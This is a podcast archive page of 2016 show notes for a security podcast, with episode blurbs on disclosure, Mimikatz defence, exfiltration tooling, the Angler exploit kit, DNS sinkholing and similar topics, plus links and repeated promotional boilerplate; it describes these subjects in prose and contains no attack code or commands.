iTunes: https://itunes.apple.com/us/podcast/2016-039-robert-hurlbut-threat/id799131292?i=1000376171899&mt=2
YouTube: https://www.youtube.com/watch?v=P5jEVJTymOg
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: October 4, 20162016-038-Derbycon Audio and 2nd Annual Podcast with Podcasters!
Mr. Brian Boettcher and I had a great time at DerbyCon. We met so many people and it really was excellent meeting all the fans who came up and said "Hello" or that they really enjoyed the #podcast. It is truly a labor of love and something that we hope everyone can learn something from.
We got some audio while at lunch at #Gordon #Biersch talking about log monitoring inspired by @dualcore's talk on #Anti-Forensics talk (http://www.irongeek.com/i.php?page=videos/derbycon6/310-anti-forensics-af-int0x80-of-dual-core) and how to evade log monitoring with Mr. Brian Boettcher and Michael Gough. (shout-out to @mattifestation, @dualcore, @baywolf88, @carlos_perez)
We sat down with Mr. Osman (@surkatty) from the Sound Security Podcast (@SoundSec), who was a first time attendee to #DerbyCon. We get his thoughts about DerbyCon and what talks he enjoyed.
Finally, our 2nd Annual podcast with our fellow podcasters was on. We had it in Bill Gardner's room (ReBoot-It podcast) (@oncee), Amanda Berlin (@infosystir) from #Hurricane #Labs Podcast, Jerry Bell (@MaliciousLink) from #Defensive #Security Podcast, Ben Heise (@benheise) from Rally #Security Podcast, Tim DeBlock (@TimothyDeBlock) from Exploring Information Security Podcast, and SciaticNerd (@sciaticnerd) from Security Endeavors podcast
IronGeek's website has all the videos available to listen to here: http://www.irongeek.com/i.php?page=videos/derbycon6/mainlist
Whiskey Bent Valley Boys: http://whiskeybentvalley.tumblr.com/ or iTunes: https://itunes.apple.com/us/artist/whiskey-bent-valley-boys/id318874442
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-038-Derbycon_podcast.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-038-derbycon-audio-2nd/id799131292?i=1000375934157&mt=2
YouTube: https://www.youtube.com/watch?v=W7ylsfwGyhc
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: September 28, 2016
2016-037: B1ack0wl, Responsible Disclosure, and embedded device security
Have you ever found a #vulnerability and wondered if it was worth the time and effort to reach back to the company in question to get the fix in?
This week, we have a story with Mr. "B1ack0wl" who found a vulnerability with certain #Belkin #embedded network devices for end users... We also find out how B1ack0wl learned his stock and trade.
https://www.exploit-db.com/exploits/40332/
Find out how he discovered it, and what steps he took to disclose the steps, and what ended up happening to the finding.
http://www.devttys0.com/ -- #embedded device hacking blog
http://io.netgarage.org/ -- #wargame site #B1ack0wl mentioned
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-037-b1ack0wl_responsible_disclosure-belkin_routers.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-037-b1ack0wl-responsible/id799131292?i=1000375462991&mt=2
YouTube: https://www.youtube.com/attribution_link?a=kChiecG0Sv4&u=/watch%3Fv%3D9_qS2s3GrT4%26feature%3Dem-upload_owner
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: September 14, 2016
2016-036: MSSP pitfalls, with Nick Selby and Kevin Johnson
Nick Selby (@nselby on Twitter) is an independent consultant who works a wide variety of jobs. During a recent engagement, he ran into an interesting issue after a company called him in to handle an incident response. It's not the client, it was with the Managed Security Service Provider (#MSSP). His blog post about the incident made big news on Twitter and elsewhere.
Nick's Blog Post: https://nselby.github.io/When-Security-Monitoring-Provides-Neither-Security-Nor-Monitoring/
So, we wanted to have Nick on to discuss any updates that occurred, and also asked an MSSP owner, Kevin Johnson, from SecureIdeas (@secureideas on Twitter), as Kevin is well versed with both sides, being a customer, and running an MSSP with his product, Scout (https://secureideas.com/scout/index.php)
We go over what an MSSP is (or what each person believes an MSSP is), we discuss the facts from Nick and his client's side, we try and put ourselves in the shoes of the MSSP, and if they handled the issue properly.
We also find out how Nick managed to save the day, the tools they used to solve the problem. We did a whole podcast on it, and maybe it's time to re-visit that...
Finally, we discuss the relationship between an MSSP and the customer, what expectations each party should see from each other, and what are the real questions each should ask one another when you're searching out an MSSP.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-036-mssp-nick_selby-kevin_johnson.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-036-mssp-pitfalls-nick/id799131292?i=1000375157370&mt=2
YouTube: https://www.youtube.com/watch?v=b1rEpaBAKpQ
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: September 11, 2016
2016-035-Paul Coggin discusses the future with Software Defined Networking
Paul Coggin is my SME when I need to know about anything network #security related. And this time, we wanted to have him on our show to discuss Software Defined Networking (#SDN)
Software defined networking allows for applications to make connections, manage devices and even control the network using #APIs. It in effect allows any developer become a network engineer. Obviously this could be a recipe for disaster if the dev is not fully understanding of the rammifiications.
And there's more good news (if you're a black hat), there's no role based security, parts of the #specification isn't fully fleshed out yet, and there are vendor specific frameworks of their own, that may not be fully interoperable with each other...
Paul talks to us about some background of #SDN, some of the pitfalls and what you need to think about when implementing Software Defined Networking.
Links referred to in the Show:
https://www.rsaconference.com/writable/presentations/file_upload/tech-r03-sdn-security-v3.pdf
https://www.blackhat.com/docs/eu-14/materials/eu-14-Pickett-Abusing-Software-Defined-Networks-wp.pdf
http://onosproject.org/2015/04/03/sdn-and-security-david-jorm/
https://people.eecs.berkeley.edu/~rishabhp/publications/Sphinx.pdf
https://www.opennetworking.org/certification
Ras Pi as an OpenFlow controller: https://faucet-sdn.blogspot.com/2016/06/raucet-raspberry-pi-faucet-controlling.html
Zodiac FX SDN boards (Excellent customer service!): http://northboundnetworks.com/
Excellent site discussing SDN: http://www.ipspace.net/Main_Page
Coursera SDN course: https://www.coursera.org/learn/sdn
Brakeing Down Security RSS: http://www.brakeingsecurity.com/rss
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-035-Paul_Coggin_SDN.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-035-paul-coggin-discusses/id799131292?i=1000374972931&mt=2
YouTube: https://www.youtube.com/watch?v=YuuNzeiexUY
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: September 6, 20162016-034: Sean Malone from FusionX explains the Expanded Cyber Kill Chain
Another great #rejectedTalk we found was from Sean Malone (@seantmalone on Twitter). The Cyber Kill Chain is a method by which we explain the methodolgy of hackers and the process of hacking.
In this discussion, we find Sean has expanded the #killchain, to be more selective, and to show the decision tree once you've gained access to hosts.
This expanded #killChain is also effective for understanding when #hackers are attacking specific systems, like #SCADA, or other specialized systems or networks, like the #SWIFT banking transfer. This discussion also is great for showing management the time and effort required to gain access to systems.
We also talk about the #OODA loop (https://en.wikipedia.org/wiki/OODA_loop) and how disrupting that will often cause attacks to go awry or to be stunted, reducing the effectiveness.
Sean T. Malone website: http://www.seantmalone.com/
Slides and presentation referred to in the podcast: http://www.seantmalone.com/docs/us-16-Malone-Using-an-Expanded-Cyber-Kill-Chain-Model-to-Increase-Attack-Resiliency.pdf
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-034-CyberKillChain.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-034-sean-malone-from/id799131292?i=1000374642630&mt=2
YouTube: https://www.youtube.com/watch?v=eBOCjaGmbMg
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: August 28, 20162016-033: Privileged Access Workstations (PAWs) and how to implement them
Bill V. (@blueteamer on Twitter) and was the 1st of a series we like to call "2nd Chances: Rejected Talks". Bill had a talk that was rejected initially at DerbyCon (later accepted after someone else cancelled) Here is the synopsis of his talk that you can now see at DerbyCon:
Privileged Access Workstations (PAWs) are hardened admin workstations implemented to protect privileged accounts. In this talk I will discuss my lessons learned while deploying PAWs in the real world as well as other techniques I've used to limit exposure to credential theft and lateral movement. I hope to show fellow blue teamers these types of controls are feasible to implement, even in small environments.
TechNet article referenced on the show:
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/privileged-access-workstations
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-033-PAWs-Bill_Voecks-Rejected_Talks.mp3
RSS: http://www.brakeingsecurity.com/rss
iTunes: https://itunes.apple.com/us/podcast/2016-033-privileged-access/id799131292?i=1000374432509&mt=2
YouTube: https://www.youtube.com/watch?v=0DwR9RcEBo0
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: August 22, 20162016-032-BlackHat-Defcon-Debrief, Brakesec_CTF_writeup, and blending in while traveling
Co-Host Brian Boettcher went to BlackHat and Defcon this year, as an attendee of the respective cons, but also as a presenter at "Arsenal", which is a venue designed to show up and coming software and hardware applications. We started off by asking him about his experiences at Arsenal, and how he felt about "Hacker Summer Camp"
Our second item was to discuss the recent Brakesec PodCast CTF we held to giveaway a free ticket to Derbycon. We discussed some pitfalls we had, how we'll prepare for the contest next year, and steps it took to solve the challenges.
The final item of the night was about travel security, since the Olympics are on, and there was a report about Olympic athletes who were robbed at gunpoint. We discuss safety while traveling, keeping a low profile, reducing risk, and reminding you to leave the overly Patriotic shirts and apparel at home.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-032-Defcon-blackHat_debrief-travel-security_CTF-writeup-final.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-032-blackhat-defcon-debrief/id799131292?i=1000374155086&mt=2
YouTube: https://www.youtube.com/watch?v=Df-JL-PiGus
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: August 15, 20162016-031:DFIR rebuttal and handling incident response
A couple of weeks ago, we discussed on our show that not all incident response events required digital forensics. We got quite a bit of feedback about that episode, so in an effort to address the feedback, we brought Brian Ventura on.
Brian has 20+ years in Information Technology, ranging from systems administration to project management and information security. He is an Information Security Architect in Portland, Oregon and volunteers as the Director of Education for the Portland ISSA Chapter. Brian holds his CISSP and GCCC, as well as other industry certifications. As the Director of Education, Brian coordinates relevant local and online training opportunities.
We discuss definitions of what digital forensics are, and how that term really has a broad range for classification.
Brian will be teaching SEC566 in Long Beach in September. Here is the link for more information to sign up for this course... https://www.sans.org/community/event/sec566-long-beach-26sep2016-brian-ventura
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-031-DFIR_discussion_and_rebuttal.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-031-dfir-rebuttal-handling/id799131292?i=1000373849931&mt=2
YouTube: https://www.youtube.com/watch?v=e3Dy001GdWM
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: August 8, 20162016-030: Defending Against Mimikatz and Other Memory based Password Attacks
In the last few years, security researchers and hacker have found an easy way of gaining access to passwords without the use of dumping the Windows hash table.
When improperly configured, the passwords are stored in memory, often in plain text.
This week, we discuss Mimikatz, and methods by which you can protect your environment by hardening Windows against such attacks.
Links to blogs:
https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft
http://blog.gojhonny.com/2015/08/preventing-credcrack-mimikatz-pass-hash.html
https://jimshaver.net/2016/02/14/defending-against-mimikatz/
Praetorian Report on pentests: http://www3.praetorian.com/how-to-dramatically-improve-corporate-IT-security-without-spending-millions-report.html
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-030-Defense_against_Mimikatz.mp3
YouTube: https://www.youtube.com/watch?v=QueSEroKR00
iTunes: https://itunes.apple.com/us/podcast/2016-030-defending-against/id799131292?i=1000373511591&mt=2
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: July 31, 2016
2016-029: Jarrod Frates, steps when scheduling a pentest, and the questions you forgot to ask...
Jarrod Frates (@jarrodfrates on Twitter) has been doing pentests as a red-team member for a long time. His recent position at #InGuardians sees him engaging many companies who have realized that a typical 'pentest #puppymill' or pentest from certain companies just isn't good enough.
Jarrod has also gone on more than a few engagements where he has found the client in question has no clue of what a 'real' pentest is, and worse, they often have the wrong idea of how it should go.
This week, I sat down with Jarrod, and we talked about what needs to occur before the pentest, even before you contact the pentesting firm... even, in fact, before you should even consider a pentest.
We discuss what a pentest is, and how it's different from a 'vulnerability assessment', or code audit. Jarrod and I discuss the overarching requirements of the pentest (are you doing it 'just because', or do you need to check a box for compliance). We ask questions like
Who should be involved setting scope?
Should #Social #Engineering always be a part of a pentest?
Who should be notified if/when a #pentest is to occur?
Should your SOC be told when one occurs?
What happens if the pentest causes incident response to be called (like if someone finds a malware/botnet infection)?
And how long do you want the engagement to be?
And depending on the politics involved, these things can affect the quality of the pentest, and the cost as well...
It was a great discussion with Jarrod, a seasoned professional, and veteran of many engagements. If your organization is about to engage a company for a pentest, you'd be wise to take a moment and listen to this.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-029-Jarrod_Frates-What_to_do_before_a_pentest_starts.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-029-jarrod-frates-steps/id799131292?i=1000373091447&mt=2
#YouTube: http://www.youtube.com/attribution_link?a=p2oq6jT3Iy0&u=/watch%3Fv%3DsTc_seN-hbs%26feature%3Dem-upload_owner
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: July 25, 2016
2016-028: Cheryl Biswas discusses TiaraCon, Women in Infosec, and SCADA headaches
Long time listeners will remember Ms. Cheryl #Biswas as one of the triumvirate we had on to discuss #mainframes and mainframe #security. (http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3)
I was interested in the goings on at BlackHat/DefCon/BsidesLV, and heard about #TiaraCon (@tiarac0n on Twitter). I went to find someone involved to understand what it was all about, and Ms. Cheryl reached out. She's an #organizer and was more than happy to sit down with me to understand why it was started. This is its inaugural year, and they already have some excellent schwag and sponsors. This is not just an event for ladies, but a way of #empowering #women, creating #mentorship opportunities, and assistance for people moving into the #infosec industry.
Also, since Ms. Cheryl's loves discussing #ICS and #SCADA problems and headaches, we got into the headaches, #challenges, and maybe some 'logical' solutions to fixing SCADA vulns... but does the logical approach work in a business sense?
TiaraCon official site: http://tiaracon.org/
TiaraCon Dates: Thursday Aug 4 - Friday Aug 5
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-028-Cheryl_Biswas_Tiaracon_ICSSCADA_headaches.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-028-cheryl-biswas-discusses/id799131292?i=1000372642921&mt=2
Youtube: https://www.youtube.com/watch?v=vsolDjsz5M4
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: July 17, 20162016-027: DFIR conference, DFIR policy controls, and a bit of news
Mr. Boettcher is back! We talked about his experiences with the #DFIR conference, and we get into a discussion about the gap between when incident response is and when you're using #digital #forensics. Mr. Boettcher and I discuss what is needed to happen before #incident #response is required.
We also discuss the Eleanor malware very briefly and I talk about finding Platypus, which is a way for you to create OSX packages using python/perl/shell scripts.
Platypus: http://sveinbjorn.org/platypus
Eleanor Malware on OSX:
https://www.grahamcluley.com/2016/07/mac-malware-uses-tor-obtain-access-systems/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-027-DFIR_policy_controls.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-027-dfir-conference-dfir/id799131292?i=1000372256055&mt=2
YouTube: https://www.youtube.com/watch?v=RPN0nDGYA5c#action=share
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: July 10, 20162016-026-powershell exfiltration and hiring the right pentest firm
Adam Crompton (@3nc0d3r) and Tyler Robinson (@tyler_robinson) from Inguardians came by to fill in for my co-host this week. We talk about things a company should do to protect themselves against data exfil.
Adam then shows us a tool he's created to help automate data exfil out of an environment. It's called 'Naisho', and if you're taking the 'Powershell for Pentesters' class at DerbyCon, you'll be seeing this again, as Adam will be co-teaching this class with Mick Douglas (@bettersafetynet).
Tyler tells us about using Cobalt Strike for creating persistent connections that are more easily hidden when you are on an engagement.
Adam's demo can be found on our YouTube channel: https://youtu.be/rj--BfCvacY
Tyler's demo of Throwback and using Cobalt Strike can be found on our YouTube Channel:
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-026-exfiltration_techniques-redteaming_vs_pentesting-and-gaining_persistence.mp3
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: July 3, 20162016-025-Windows Registry, Runkeys, and where malware likes to hide
The windows registry has come a long way from it's humble beginnings in #Windows 3.11 (Windows for Workgroups). This week, we discuss the structure of the Windows registry, as well as some of the inner workings of the registry itself.
We also discuss where are some good places to find malware, some of the key values that you can find in the #registry and their meanings. We also discuss what atomicity is and how the registry is a lot like a database in how it functions.
And no podcast about Windows #forensics should be done without talking about a tool, and our friend David #Longenecker (@dnlongen on Twitter) created a cross-platform tool that allows you to take exports of the registry and analyze them without need to be physically on the host. You can find reglister here:
http://www.securityforrealpeople.com/2015/08/introducing-new-forensics-tool-reglister.html
We finish up discussing our #DerbyCon giveaways and a peek at what will be a very interesting podcast next week.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-025-Windows_Registry-RunKey_artifacts-finding_where_malware_hides.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-025-windows-registry/id799131292?i=1000371465676&mt=2
SoundCloud: https://soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: June 27, 2016
2016-024: Kim Green, on CISOaaS, the Redskins Laptop, and HIPAA
We are pleased to introduce Ms. Kim Green (Twitter: @kim1green). She is the CEO of KAZO Security, as well as the CISO/CPO of Zephyr Health, a #SaaS based #Healthcare data #analytics company. She brings over 20 years of experience in healthcare and leadership to help small and medium business companies get help from a #CISO to assist in an advisory role.
Ms. Green also started a bug bounty program at Zephyr Health to assist them in shoring up their application, finding #vulnerabilities that their internal teams may have missed. We are going to discuss with her why they decided to make it a private bug bounty, and what was the result.
https://www.youtube.com/watch?v=GbW777t1tTA -- more about the bug bounty
We also discuss why#HIPAA seems to be so far behind in terms of being able to protect #PHI/#PII and what if anything can be done to fix it.
We finish up discussing a recent news story about the how the National Football League (#NFL) team Washington Redskins had a trainer lose a laptop with the PII and health information on several thousand NFL players. We discuss why they did not violate HIPAA, and what if anything they did violate.
iTunes: https://itunes.apple.com/us/podcast/2016-024-kim-green-on-cisoaas/id799131292?i=1000371021883&mt=2
YouTube: https://www.youtube.com/watch?v=F9zvkeuON4I&list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K&index=1
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: June 20, 20162016-023- DNS_Sinkholing
Picture yourself in the middle of a security incident... A malware infection, or you have hosts on your network are part of a botnet. You figured out where how the malware is communicating with the command and control servers, but if you just kill the connection, the malware stop functioning. What do you do?
In some cases, you might be able to employ a DNS #sinkhole to route traffic harmlessly to or through a honey network that can be used to further analyze things like #infection vectors, #protocols, commands, and #network movement. You can also use #DNS sinkholing to disable the malware if certain conditions are met.
Like most tools, sinkholing can be used for good, but there are legal issues if it's used incorrectly. We discuss some of the legalities. It won't disable all malware or exploit kits, but for some infections, this is another tool in your toolbox you can employ.
In a continuation from last week's show with Earl Carter about the #Angler #Exploit Kit, we discuss how Angler is able to bypass #EMET and #ASLR protections... https://www.fireeye.com/blog/threat-research/2016/06/angler_exploit_kite.html
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-023-DNS_Sinkholes2.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-023-dns-sinkholing/id799131292?i=1000370572088&mt=2
YouTube: https://youtu.be/67huikA2QFg
Links we used to discuss sinkholing:
Basic sinkhole app using BIND: https://isc.sans.edu/forums/diary/DNS+Sinkhole+ISO+Available+for+Download/9037/
*UPDATED literally hours after I posted this show* Version 2.0 of the DNS sinkhole ISO: https://isc.sans.edu/diary/21153
http://resources.infosecinstitute.com/dns-sinkhole
https://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
Blackhole DNS servers -- http://www.malware-domains.com/ or http://www.malwaredomains.com/
http://handlers.dshield.org/gbruneau/sinkhole.htm
Malware blackhole DNS campaign (2013) - http://www.bleepingcomputer.com/forums/t/511780/dns-sinkhole-campaign-underway-for-cryptolocker/
http://someonewhocares.org/hosts// -massive dns sinkholing list
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
images:
Image: https://www.enisa.europa.eu/topics/national-csirt-network/glossary/files/dns_sinkhole
Published on: June 13, 20162016-022: Earl Carter dissects the Angler Exploit Kit
Earl Carter spends all day researching exploit kits and using that information to protect customers from various malware payloads that spread ransomware. This week we sit down with him to understand the #Angler EK.
He starts us off with a history or where it came from and how it gained so much popularity, evolving from earlier EKs, like #BlackHole, or WebAttacker. We even discuss how it's gone from drive-by downloads, to running only in memory, to being used in malvertising campaigns. We even get to hear about how the creators "rent" out the EK, and how they also control the malvertising side as well. Great insights into how the EK eco-system operates...
We talk about some of the vulns used by exploit kits. Contrary to popular belief, the vulns used don't always have to be 0day. Blue teamers will learn valuable insights in protecting your networks from this EK.
Direct Link:http://traffic.libsyn.com/brakeingsecurity/2016-022-earl_carter_dissects_angler_ek.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-022-earl-carter-dissects/id799131292?i=1000370105193&mt=2
Links referenced during the show:
Earl's slides from Bsides Austin: http://www.slideshare.net/EarlCarter3/bsides-anglerevolution-talk-60408313
http://blog.0x3a.com/post/118366451134/angler-exploit-kit-using-tricks-to-avoid-referrer
http://blogs.cisco.com/security/talos/angler-flash-0-day
http://malware.dontneedcoffee.com/2014/08/angler-ek-now-capable-of-fileless.html
https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
http://blogs.cisco.com/security/talos/angler-flash-0-day
https://hiddencodes.wordpress.com/2015/05/29/angler-exploit-kit-breaks-referer-chain-using-https-to-http-redirection/
https://heimdalsecurity.com/blog/ultimate-guide-angler-exploit-kit-non-technical-people/
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast
